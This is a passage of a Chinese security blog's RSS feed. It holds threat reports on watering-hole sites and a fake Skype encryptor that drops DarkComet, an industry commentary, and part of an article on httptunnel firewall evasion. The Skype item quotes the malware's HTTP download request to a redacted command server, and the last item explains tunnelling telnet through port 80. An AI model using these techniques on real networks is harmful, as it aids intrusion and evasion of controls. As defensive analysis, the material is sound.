零时差漏洞攻击码。虽然无法完全的确认，但至少有部分网站属于“水坑”攻击。&#xA;{BLOCKED}h2.mysoft.tw&#xA;{BLOCKED}tix.com&#xA;get.{BLOCKED}s.com&#xA;ie.{BLOCKED}1.co.uk&#xA;info.{BLOCKED}u.edu.tw&#xA;invitation.{BLOCKED}as.com&#xA;{BLOCKED}fessional-symposium.org&#xA;{BLOCKED}o.konkuk.ac.kr&#xA;service.{BLOCKED}a.com.tw&#xA;{BLOCKED}k.vip-event.info&#xA;update.{BLOCKED}alive.com&#xA;w3.{BLOCKED}u.edu.tw&#xA;www.as.{BLOCKED}e.edu.tw&#xA;www.{BLOCKED}news.in&#xA;www.{BLOCKED}gameshow.com&#xA;www.{BLOCKED}e.com&#xA;www.{BLOCKED}a.org.tw&#xA;www.{BLOCKED}sia.tv&#xA;www.{BLOCKED}in.com.tw&#xA;有趣的是，这 19 个网站可以分成 14 组。换言之，除了利用此漏洞的共同点外，他们之间没有任何明显的关连。从其中 11 组中，我们发现了 11 种不同的有效负荷（其他三组，我们无法收集到有效负荷）。&#xA;除了和Nitro 相关的Poison Ivy 还有上面所提到的PlugX 远程控制木马外，趋势科技发现了其他熟悉的远程控制木马，和一些不熟悉的（至少对我来说）恶意软件。其中一个被识别出的远程控制木马是invitation.{BLOCKED}as.com 的有效负荷，被称为“DRAT”远程访问木马，这是由“DarkSecurity Team”所开发的远程访问木马，并且在网络上被广泛使用。&#xA;DRAT 是一个全功能的远程访问木马，让攻击者完全控制入侵的计算机。这个DRAT 被设定连到{BLOCKED}le.moo.com（{BLOCKED}.{BLOCKED}.229.82）。&#xA;另一个特别的木马程序出现在被入侵的国防新闻网站，会访问Elderwood攻击者。这个例子中所使用的加壳程序和Hydraq 木马程序所使用一样的加壳程序，这支木马程序因为被用在对Google 和其他 30 家公司的Aurora 攻击而恶名昭彰。这支木马（被称为“NAID”）也是在 2012 年 6 月被嵌入到被入侵人权组织网站的漏洞攻击码的有效负荷。在这个例子中，一个被入侵的国防相关新闻网站被放置了会植入NAID 木马程序的IE 零时差漏洞攻击码，进而连到support.</description>
    </item>
    <item>
      <title>暗藏木马的假冒Skype加密软件</title>
      <link>https://anwangtanmi.github.io/posts/2b6225be597965ebfeb84a5a4b0db31c/</link>
      <pubDate>Thu, 10 May 2012 11:47:27 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/2b6225be597965ebfeb84a5a4b0db31c/</guid>
      <description>作者：趋势科技资深威胁研究员 Natt Villeneuve&#xA;CNN 的报导也侧面证明了有恶意软件正在通过 Skype 传播，这让我们想起另一起以前发现的，会利用Skype 执行的攻击。&#xA;趋势科技发现，有个网页宣称可以提供 Skype使用的加密软件。这个网页被托管在位于叙利亚的网站 {BLOCKED}encription.sytes.net 上，网站 IP 地址是 {BLOCKED}.{BLOCKED}.{BLOCKED}.0.28。这个地址和之前一些攻击所用的命令与控制服务器完全相同。网页上有个内嵌的 YouTube 视频，声称该软件来自“IT Security Lab（安全实验室）”，可以用来加密 Skype 的语音通讯。&#xA;如果用户上当下载该文件，随后即可获得一个据称可以对用户的 Skype 数据进行加密的程序。这个程序为Skype Encription v2.1.exe，已被趋势科技命名为 BKDR_METEO.HVN。分析后，我们发现没有任何证据表明该程序可以提供所宣称的加密功能。&#xA;这个文件中包含的一个字符串证明，文件是由“SyRiAnHaCkErS”所编写的：&#xA;C:\Users\SyRiAnHaCkErS\Desktop\test\final\final\obj\x86\Debug\SkypeEncription v 2.1.pdb&#xA;运行后，该软件会执行下列网络操作：&#xA;GET/SkypeEncription/Download/skype.exe HTTP/1.1&#xA;Host: {BLOCKED}.{BLOCKED}.0.28&#xA;Connection: Keep-Alive&#xA;该操作会下载名为skype.exe 的文件，而该文件已经被确定为BKDR_ZAPCHAST.HVN，实际上这就是恶意软件DarkComet 的 3.3 版，该软件会连接到 {BLOCKED}.{BLOCKED}.0.28这一 IP 地址的 771 端口。在趋势科技的测试环境中，通过对网络通讯进行重定向，确认这实际上就是 DarkComet。&#xA;一旦安装 BKDR_ZAPCHAST.HVN，攻击者就可以通过DarkComet 远程访问木马（RAT）获得被感染系统的完全控制权。关于 DarkComet 远程访问木马的功能已经在这里和这里介绍过了。&#xA;请注意，Skype本身就会使用 AES 加密技术对语音通讯和文字通讯内容进行加密，当然视频通话也受到该技术的保护。&#xA;趋势科技的用户无需担心，您已经可以通过趋势科技云计算安全技术获得妥善保护，完全可以检测并清理掉相关恶意软件，预防所有威胁。&#xA;@原文出处：FakeSkype Encryption Software Cloaks DarkComet Trojan&#xA;本文版权为趋势科技所有，对于非赢利网站或媒体转载请注明作者以及原文链接。谢谢合作！&#xA;爱趋势社区—下载/论坛/分享 http://www.iqushi.com&#xA;官方微博—拿礼品/分享最新IT资讯 http://t.sina.com.cn/trendcloud</description>
    </item>
    <item>
      <title>信息安全的“暗伤”</title>
      <link>https://anwangtanmi.github.io/posts/26753fd2bdd407a01e9aa32028185006/</link>
      <pubDate>Wed, 29 Nov 2006 08:22:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/26753fd2bdd407a01e9aa32028185006/</guid>
      <description>来源：计算机世界 原创-IT 胡英&#xA;——————————————————————————–&#xA;“城外的人想进去，城内的人想出来，人生的事，大抵如此。” 钱钟书老先生这句名言，用在信息安全领域再恰当不过。 没有进入这一领域的人，将它看成是摆脱IT困境，维持高速发展的最后一轮机会，于是，一窝蜂而上。 已经进入这一领域的人，过得好的并不多，很多在惨淡经营，有些在苦撑，有些在暗地里转型，有些干脆从此消失…… 信息安全产业并不像想象的那样充满了机会，产业在荆棘的道路上跋涉，反而处处布满了陷阱，被划上了道道“暗伤”。 我们披露这些“暗伤”，是为了引起业内更多的领导、专家、用户及厂商的重视，让幼小的信息安全产业能在一个健康有序的环境中顺利发展、壮大。 政策暗伤：收费繁多何时了？ 在发展初期，政策就像一把双刃剑，在保护企业和用户的同时，由于管理的不规范，也深深刺伤了产业。 在进入信息安全产业之前，许多中国企业凭着直觉感到，这一产业似乎是国内企业在新IT时代赶超国外的最后一轮机会！因为，信息安全不仅指企业或个人的信息网络安全，它更是关系到国家安全、社会稳定的头等大事，尤其在许多专家预计不久将爆发的信息大战中，谁掌握了网络信息安全的核心技术，谁就能掌握网络信息战的制空权！谁都清楚，保卫国家安全必须依靠自己的军队，而不能依靠雇佣军，所以，这些网络安全的核心武器，必须掌握在自己人的手中！就连美国这样一个号称高度自由的国家，也于今年出台了美国《网络空间安全国家战略》，其中不仅详细说明了未来美国将面临的信息安全风险，还指出必须依靠本国自己的力量才能保证国家的安全！ 在这种大环境下，国内厂商兴奋异常，国家依靠自己的力量发展自己的信息安全产业，意味着国家在资金、政策、税收等方面的扶植力度将会加大，意味着虽然我们的信息安全产业相对国外起步较晚，但国内企业具有非常高的胜算机会，而不会像以往的IT业一样，不得不被国际社会几大巨头牵着鼻子走！尤其在近年来整体IT环境下滑的情况下，信息安全无疑是国内企业的突破口。 被美好的预期冲昏了头脑，许多人来不及仔细思索便一猛子扎进了信息安全江湖！却不知，刚刚潮起的信息安全领域，里面布满了暗礁和荆棘。在发展初期，政策就像一把双刃剑，在保护企业和用户的同时，由于管理的不规范，也深深刺伤了产业。 很多人以为获得了公安部的销售许可就算是领到了进入这一领域的“许可证”，但只有那些在此领域“混”得稍久的“老牌厂商”才了解里面的“难言之隐”：公安部的销售许可只是进入这一行业的第一道门槛，随后，进入军队系统要有军队许可、进入涉密网要获得保密许可、产品质量保证要获得安全部门的许可。这就是业内许多厂商自嘲又无奈的“公保机盯”大餐。此外，各个行业还专门自设了自己的“入围选型”门槛，如进入金融业要获得金融选型入围，进入电信网要获得电信选型入围……这几道门槛，就像几块大石，压得幼小的企业抬不起头，许多企业不堪重负，甚至夭折。 之所以有这么多的“许可门槛”、“认证门槛”，是因为里面有着巨大的经济利益。一位国内信息安全企业老总给记者算过一笔账：企业研究出一种新的信息安全产品，如果要拿齐这几种许可证，至少得花10万元人民币，这还只是新产品的价码，不包括产品升级换代的费用。一个企业不可能只研制一种信息安全产品，一般来说会有3～5种产品，每种产品一年中很可能升级1～2次，仅各类认证费用，一个企业一年就得花上百万元人民币！ 国家对信息安全产业实行许可证管理制度本无可厚非，这是为了保障广大用户的合法权益，保证产品的质量，也保障信息安全企业的合法利益。但问题的关键是，需不需要如此多的部门进行多重认证？作为发放许可证的职能机构，需不需要索取这样高额的费用？ 乱收费现象严重，已经深深制约了刚刚起步的国内信息安全企业的发展，以至于业内出现了一个很奇怪的现象: 国外企业的产品反正进不了那几个关键部门，于是不需要拿那么多的许可证，反而凭借技术、资金实力而一身轻松地攻打大行业，如金融、电信等企业领域，而对本来就弱小的国内企业而言，在大行业内没有实力与国外企业竞争，进入关键部门又有这道道收费门槛，无疑是雪上加霜！ 由此出现一个无奈的现象，很多国内企业不愿意进行产品升级，即使升了级，也不愿意大肆渲染，对外还宣称产品改动不多。一家很著名的企业，明明在防火墙和入侵检测系统中对产品进行了重新设计和巨大的改造，但在版本号中只是从3.0升级到了3.1，对外显示产品变化不大。这家企业老总说：我们也很无奈，谁不希望说自己的企业有技术含量，具备快速更新换代的能力，但如果说产品改变巨大，接下来就是大笔认证费用等着你，在防火墙市场竞争如此激烈的情况下，我们什么时候才能收回这笔费用啊？ 有专家认为，近年来，公路乱收费现象严重，国家已开始抓紧整顿治理，而在信息安全产业道路上的乱收费现象同样严重，同样需要国家下大力整顿，否则，发展我国自主的信息安全产业只是一句空话而已。 据悉，一家机关媒体通过新闻内参的形式已经向中央有关领导反映了此事，目前，中央有关领导已经有了明确的批示，要对信息安全产业乱收费现象进行整顿治理，这无疑是产业的利好消息，产业急切地盼望政策环境改善的那一天早日到来。&#xA;市场暗伤：只见森林，不见树木？&#xA;中国信息安全产业一年的产值只有区区十多亿元，还不及短信在春节黄金周期间短短的8天里创造的70多亿元产值的三分之一，这真令人失望！ 虽然产业发展呼声极高，不时出现的黑客攻击事件也在不断地提醒着业内的人们要高度重视信息安全建设，企业在进行IT投资时，也在不断加大对信息安全的投资比例，但信息安全整体市场究竟有多大？值不值得人们趋之若骛、一窝蜂地投入到产业内？恐怕许多人没有深思过。 中国整体信息安全市场的数字究竟有多大？一段时间以来，业内流行的数据是，2002年中国的信息安全市场达到了40亿元人民币，统计渠道不得而知，也许就像中国的许多数据一样是某些专家“拍脑袋”得出的。虽然IDC公司对2002年的数据还没有统计出来，但从IDC2001年的数据来分析，IDC预计2002年中国的信息安全市场只有16亿元人民币。两者相差2倍多，这不得不让人迷惑。 专家分析，这种现状是必然的，这是由于信息安全产业的特殊性造成的。大量采用信息安全产品的用户“养在深闺，足不出户”，因为，谁也不愿意将自己需要保护的系统对外宣传，引起广泛的注意，因为，谁也不能保证自己的系统是万无一失的。此外，军队、政府等特殊部门的应用情况从来不对外公布，这就造成了统计渠道的不畅和统计数据的混乱。 但是，从信息安全厂商的销售数据来看，我们或许可以得出些结论。据记者了解，一般在中国的大型信息安全厂商（包括本土企业和在中国的外企）一年的销售额只有几千万元人民币，最大的1～2家也声称刚刚超过了1亿元人民币，而大部分企业在信息安全领域的销售额只有几百万元人民币，如此一来，虽然在册的从事信息安全销售的厂商数超过了千家，但总体销售数据依然很小！ 中国信息安全产业一年的产值只有区区十多亿元，还不及短信在春节期间短短的8天内创造的70多亿元产值的三分之一，这真令人失望！ 其实，仔细思索，这也不奇怪，产值不大但责任重大，是信息安全产业的主要特点。一个企业无论对信息安全产业如何重视，但一般对它的投资仅占IT总体投资的15%左右，最依赖IT生存的企业对它的投资也不会超过IT总体投资的50%。毕竟，信息安全产业是依附于信息产业发展而发展的一个小门类，要想将产业做大很难！ 专家用“只见森林，不见树木”来形容产业的现状。我们能看到前景，但要看清楚直至挖到财富，依然要走很长的路！ 厂商数量太多、规模普遍偏小，不仅使厂商的抗风险能力极差，也影响风险投资的进入，如果没有风险资金的进入，缺乏资金的老问题又会困扰企业的发展，不利于产业的迅速扩张。据悉，有关专家已经看到了这一问题，并提出，“减少数量、扩大规模”是2003年中国信息安全产业的主要目标。 好在信息安全产业每年50%以上的增长速度足以令人兴奋，就凭这一点，也足以成为习惯了长期高速发展的中国IT企业继续保持高速发展的新的经济增长点。只是，作为准备涉足这一领域的厂商，进入之前一定要有充分的思想准备和资金技术储备。 产品暗伤：谁了解用户需求？&#xA;大多数厂商在防火墙、IDS、反病毒、VPN等几类主流的产品中，拼杀得“你死我活”，而用户需要的一些专业的安全防护工具在市场却难觅踪影，这就是业内专家所说的“产业结构失衡”状态。 提起信息安全，很多人自然联想到防火墙、IDS、杀病毒、VPN等耳熟能详的产品，于是，很多厂商以这几类产品切入信息安全领域，然后逐渐扩张到信息安全的其他门类。那么，作为用户又是如何想的呢？ 跟踪信息安全领域两年多，记者多次与用户交流，发现很多大型行业用户在考虑信息安全问题时，首先考虑如何进行组织机构的调整，如何在现有网络拓扑的基础上制定信息安全策略，最后才考虑采用信息安全产品的问题。换言之，信息安全产品在用户心目中的位置排在最后，并且只是作为实现策略的工具而已。 一位在银行负责信息安全的处长说，很多厂商提供的产品根本满足不了我们的需求，他们提供的是产品，而我们需要的是适合自己银行网络拓扑结构的安全策略，虽然很多厂商也说能提供策略咨询服务，但那些策略要么是站在产品立场上的咨询服务，要么是纸上谈兵，并不适合我们的网络结构，而由于银行网络的保密性，我们很难将自己的需求直接告诉厂商。于是，不得已，我们只有自己学习，自己制定安全策略，自己选择产品。 据记者了解，在市场上，大多数厂商还是以提供产品为主，虽然也打整体解决方案的大旗，虽然也号称提供安全咨询服务，但正如用户的理解，这些服务都是建立在产品基础上的服务，是为了卖产品而为用户画的一个饼！ 于是，一方面，用户对信息安全有着强烈的需求，另一方面，信息安全厂商的规模和利润做不大，因为，中间缺少一个必要的环节，那就是专业的信息安全服务。专家分析，实施信息安全工程就像实施 ERP一样，企业首先必须进行流程重组（在信息安全领域是进行组织机构、人员的重组）后，才能利用各种安全工具实施安全策略。 市场呼唤中立的、专业的信息安全服务厂商，但它们的生存状态又怎么样呢？记者也曾接触过一些这样中立的服务公司，但它们普遍生存状态不佳。一方面，人们的观念还没有更改过来，为服务单独付一大笔费用在某些用户的观念中还很难接受；另一方面，这些新成立的中立性服务公司还没有创出品牌，其咨询水平还很难让人信服。&#xA;在信息安全领域，需求与供给的矛盾日渐突出。 大多数厂商提供的产品依然集中在防火墙、IDS、反病毒、VPN等主流上，使产业走上了一条“千军万马过独木桥”的现象，在这几类主流的产品中，厂商拼杀得“你死我活”，而用户需要的一些专业防护安全产品，如审计工具、预防入侵工具等，市场却难觅踪影，这就是业内专家所说的“产业结构失衡”状态。 造成这种现状的原因一方面是进入这几类主流产品领域的技术门槛近年来已经极大降低，投入点资金就能顺利地开发自己的防火墙、IDS等产品；另一方面，很多厂商不了解信息安全领域囊括的产品门类多、技术含量高的特点，致使其他新类别的产品因为厂商缺乏创新性而无人问津，使整个产业缺乏创新意识。 根据记者的了解，具有创新性的安全产品目前在市场上依然非常紧俏。例如，记者曾编发过一篇一个厂商推出了专业防止宽带偷盗新品的新闻，新闻发出不久，就收到了读者的反馈，要求与厂商联系购买产品，不经意间，记者促成了一笔生意。由此可见，用户因为自身安全需求一直在不断寻找适合自己的安全新产品，而厂商的产品只要能解决特定安全问题，总会有用户需要，厂商所面临的竞争环境也不会那么激烈。 对业内的厂商而言，多动动脑筋开发一些功能性能独特的产品，是不是比跟在别人后面，“人云亦云”挤在狭小的空间中竞争更有意义呢？ 应用暗伤：谁能将产品用好？&#xA;很多企业即使买来了信息安全产品，但事故依然不断，安全还是得不到保障。为什么呢？这至少让用户对信息安全产业的信心大打折扣！ 以上四类主流产品之所以在信息安全领域产值所占比例较高，成为众厂商追捧的对象，是因为其所覆盖的应用领域较广的缘故，除了在那些大的行业，如金融、电信、政府、民航、电力等严重依赖信息化的行业对它有需求外，一些中小企业在保护自己的企业网安全时，首先就想到了这四种产品，正因为中小企业的关注，才显示出它们在数量上的优势，显示出在产业中所占产值比例较高，因此，其重要性的权重也相应加大。 但对那些广大的中小企业，即使买来了信息安全产品，为什么事故依然不断，安全还是得不到保障呢？这至少让用户对信息安全产业的信心大打折扣！ 以今年1月25日流行的Slammer病毒攻击为例，几个小时之内，病毒席卷全球，攻击了全球成千上万的网络，其实，病毒所依据的只是微软去年7月份就发布了补丁程序的SQL数据库的漏洞，那么，为什么还有那么多的网络“中毒”？这是因为用户没有及时打上补丁，其中，很多用户不知道要打补丁，也有很多用户是抱着侥幸心理懒得打补丁。换句话说，是用户信息安全意识不强或对已有产品使用不当造成的。 而更多的情况是，作为广大中小企业的用户，本身并没有信息安全专业人员，即使有那么1～2个技术人员，也只是普通的IT人员，对信息安全知识一知半解，对信息安全产品似懂非懂，这就注定了无法将产品用好！ 记者曾经接触过几个这样的用户，网络防毒产品买了来自不同厂商的2套，之所以这样做，只是因为不会用以前的老版本，而厂商的服务又不到位，于是干脆换一家服务好、好用的产品，反正花的不是自家的钱。另一些情况是，有些用户对防火墙的配置策略基本上半年甚至一年都不变，一旦需要变化，却由于没有懂得相关配置的人员而束手无策，因此，每次更换策略都依赖于厂商人员的上门服务，厂商对此不堪重负，而用户也甚感不方便。 应用的不到位有几个方面的原因：一是用户对信息安全产品本身的认识不足，以为凭几个网管员就可以管好整个网络的安全，而舍不得在信息安全的人员培训方面进行再投资。这其实是应用上的最大误区，因为IT与信息安全是完全不同的学科，专业的IT人员不一定是专业的信息安全人员，专业的信息安全人员必须经过再培训的过程。国家已认识到这一问题，目前正在制定信息安全维护人员持证上岗制度，保证上岗人员的质量。 应用不到位的另一个重要原因是厂商的服务不到位，虽然很多厂商号称自己已经转型为安全服务厂商，但提供的服务多数是前述的安全咨询服务或产品的售后服务，而惟独缺少对产品应用的运维服务。对信息安全产业而言，这是维持信息安全产业链的一个必要的环节，也是考验厂商实力的指标。信息安全的运维服务不能像PC的后期服务一样，换某些板卡就能解决问题，而是需要让渠道同样具有安全服务能力，能为用户提供贴身的服务，这就要求厂商对渠道服务进行深入培训，建立良好的对渠道的掌控能力，而这需要时间的积累。 用户对信息安全产品应用得不好，直接影响信息安全产品的推广，产品推广不出去，直接影响信息安全产业，成为制约产业发展的另一主要障碍。</description>
    </item>
    <item>
      <title>由http暗藏通道看网络安全</title>
      <link>https://anwangtanmi.github.io/posts/592a03016b5b6926183d15fe7fcf2e8f/</link>
      <pubDate>Wed, 13 Mar 2002 08:58:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/592a03016b5b6926183d15fe7fcf2e8f/</guid>
      <description>由http暗藏通道看网络安全 内容： 什么是http暗藏通道 什么是Httptunnel Httptunnel带来的安全问题 一些解决思路 总结 参考资料 关于作者 宫一鸣 ([email protected])&#xA;中国电信网络安全小组核心成员&#xA;2001 年 12 月&#xA;通过本文的httptunnel 技术同时逃过了防火墙的屏蔽以及系统的追踪试验，我们可以看到网络安全仅仅依靠某种或某几种手段是不可靠的，同时对安全系统的盲目性依赖往往会造成巨大的安全隐患。希望通过本文能引起管理员对网络安全防护系统的思考。 什么是http暗藏通道 什么是局域网安全，系统管理员怎样才能保障局域网的安全？这是一个不断变化的安全概念，很长的一个时期以来，在局域网与外界互联处放置一个防火墙，严格控制开放的端口，就能在很大程度上掌握安全的主动权，方便的控制网内外用户所能使用的服务。比如，在防火墙上仅仅开放80，53两个端口，那么无论是内部还是外面的恶意人士都将无法使用一些已经证明比较危险的服务。&#xA;但要注意一点，防火墙在某种意义上是很愚蠢的，管理员对防火墙的过分依赖以及从而产生的懈怠情绪将不可避免的形成安全上的重大隐患，作为一个证明，”通道”技术就是一个很好的例子，这也是本文要讨论的。&#xA;那么什么是通道呢？这里所谓的通道，是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上，然后穿过防火墙与对端通讯，当封装的数据包到达目的地时，再将数据包还原，并将还原后的数据包交送到相应的服务上。举例如下：&#xA;A主机系统在防火墙之后，受防火墙保护，防火墙配置的访问控制原则是只允许80端口的数据进出，B主机系统在防火墙之外，是开放的。现在假设需要从A系统Telnet到B系统上去，怎么办？使用正常的telnet肯定是不可能了，但我们知道可用的只有80端口，那么这个时候使用Httptunnel通道，就是一个好的办法，思路如下：&#xA;在A机器上起一个tunnel的client端，让它侦听本机的一个不被使用的任意指定端口，如1234，同时将来自1234端口上的数据指引到远端（B机）的80端口上（注意，是80端口，防火墙允许通过），然后在B机上起一个server，同样挂接在80端口上，同时指引80端口的来自client的转发到本机的telnet服务端口23，这样就ok了。现在在A机上telnet本机端口1234，根据刚才的设置数据包会被转发到目标端口为80的B机，因为防火墙允许通过80端口的数据，因此数据包畅通的穿过防火墙，到达B机。此时B机在80端口侦听的进程收到来自A的数据包，会将数据包还原，再交还给telnet进程。当数据包需要由B到A返回时，将由80端口再回送，同样可以顺利的通过防火墙。&#xA;实际上tunnel概念已经产生很久了，而且很有可能读者使用过类似的技术，比如下面的网址http://www.http-tunnel.com。它是一个专业提供tunnel服务的公司，通过他们的在线tunnel server,局域网内的用户可以使用被防火墙所屏蔽的ICQ，E-MAIL，pcanywhere， AIM，MSN， Yahoo，Morpheus，Napster等等诸多软件。我们看到，这里有ICQ,Napster等软件，相信我们的读者很多都使用过走proxy的ICQ,OICQ等等，其实他们的原理是差不多的。&#xA;什么是Httptunnel 作为一个实际的例子，我们下面来介绍一个在”非公开领域”使用的的通道软件，httptunnel。在httptunnel主页（请参阅参考资料）上有这么一端话，&#xA;httptunnel creates a bidirectional virtual data connection tunnelled in HTTP requests. The HTTP requests can be sent via an HTTP proxy if so desired. This can be useful for users behind restrictive firewalls. If WWW access is allowed through a HTTP proxy, it’s possible to use httptunnel and, say, telnet or PPP to connect to a computer outside the firewall.</description>
    </item>
  </channel>
</rss>
